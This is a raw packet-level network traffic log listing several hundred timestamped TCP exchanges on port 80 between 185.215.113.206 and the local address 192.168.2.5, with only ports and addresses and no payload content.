Nov 12, 2024 00:06:27.681525946 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681539059 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681555033 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681559086 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681577921 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681581020 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681591034 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681600094 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681608915 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681619883 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681631088 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681632996 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681643009 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681647062 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681655884 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681673050 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681678057 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681689978 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681699038 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681700945 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681713104 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681725025 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681732893 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681745052 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681745052 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681759119 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681768894 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681770086 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681782961 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681793928 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681793928 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681813002 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681813955 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681833029 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681838036 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681845903 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681865931 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681866884 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681879044 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681899071 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681905985 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681911945 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681926966 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681941032 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681946993 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681948900 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681957960 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681969881 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.681977034 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.681982994 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682002068 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682005882 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682013988 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682020903 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682028055 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682040930 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682051897 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682061911 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682064056 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682077885 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682094097 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682096958 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682110071 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682116032 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682127953 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682135105 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682138920 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682149887 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682151079 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682162046 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682171106 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682174921 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682187080 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682197094 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682199001 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682214022 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682220936 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682224989 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682230949 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682239056 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682251930 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682261944 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682262897 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682285070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682287931 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682298899 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682308912 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682310104 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682322979 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682333946 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682333946 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682348013 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682358980 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682358980 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682368040 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682370901 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682384014 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682399988 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682404041 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682416916 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682426929 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682426929 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682442904 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682447910 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682461023 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682468891 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682472944 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682487011 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682495117 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682498932 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682512045 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682512045 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682524920 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682534933 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682537079 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682548046 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682559013 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682564020 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682571888 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682574034 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682584047 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682595015 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682606936 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682612896 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682626963 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682642937 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682670116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682682037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682692051 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682703972 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682703972 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682718039 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682720900 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682732105 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682738066 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682749987 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682761908 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682770014 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682775974 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682784081 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682790041 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682796001 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682801962 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682812929 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682823896 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682826042 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682836056 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682836056 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682848930 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682858944 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682863951 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682872057 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682884932 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682887077 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682897091 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682902098 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682910919 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.682914972 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.682945013 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683207035 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683252096 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683373928 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683384895 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683396101 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683418989 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683442116 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683527946 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683540106 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683551073 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683561087 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683573008 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683576107 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683578968 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683590889 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683592081 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683605909 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683618069 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683640957 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683653116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683659077 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683672905 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683685064 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683690071 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683696032 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683706999 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683712006 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683718920 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683732033 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683737993 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683743000 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683754921 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683763027 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683765888 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683778048 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683780909 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683789968 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683800936 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683804989 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683813095 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683825970 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683829069 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683836937 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683847904 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683850050 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683860064 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683867931 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683871984 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683878899 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683886051 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683897972 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683908939 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683911085 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683922052 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683933973 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683939934 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683945894 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683954954 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683959007 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683971882 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683978081 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.683984041 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.683995962 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684003115 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684007883 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684021950 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684024096 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684034109 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684045076 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684045076 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684057951 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684066057 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684070110 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684086084 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684087038 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684103012 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684114933 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684117079 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684127092 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684128046 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684140921 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684151888 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684154987 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684163094 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684175014 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684180021 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684186935 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684197903 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684201002 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684210062 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684216022 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684221983 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684241056 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684247971 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684258938 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684272051 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684273005 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684283972 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684295893 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684303999 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684314966 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684326887 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684333086 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684344053 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684345961 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684355974 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684366941 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684376955 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684377909 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684387922 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684389114 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684398890 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684410095 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684411049 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684425116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684433937 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684437990 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684449911 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684462070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684463978 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684473991 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684478998 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684488058 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684499025 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684501886 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684510946 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684521914 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684531927 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684534073 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684541941 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684546947 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684559107 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684571028 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684576035 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684582949 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684593916 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684609890 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684612036 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684617996 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684624910 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684637070 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684648037 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684648991 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684665918 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684675932 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684679031 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684684038 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684690952 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684701920 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684711933 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684712887 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684725046 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684737921 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684746027 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684753895 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684758902 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684772968 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684781075 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684783936 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684797049 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684799910 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684803963 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684813976 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684823990 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684830904 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684834957 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684847116 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684858084 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684860945 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684875965 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684881926 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684890985 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684902906 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684911966 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684916019 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684926987 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684936047 CET	49758	80	192.168.2.5	185.215.113.206
Nov 12, 2024 00:06:27.684937000 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684951067 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684961081 CET	80	49758	185.215.113.206	192.168.2.5
Nov 12, 2024 00:06:27.684962034 CET	49758	80	192.168.2.5	185.215.113.206
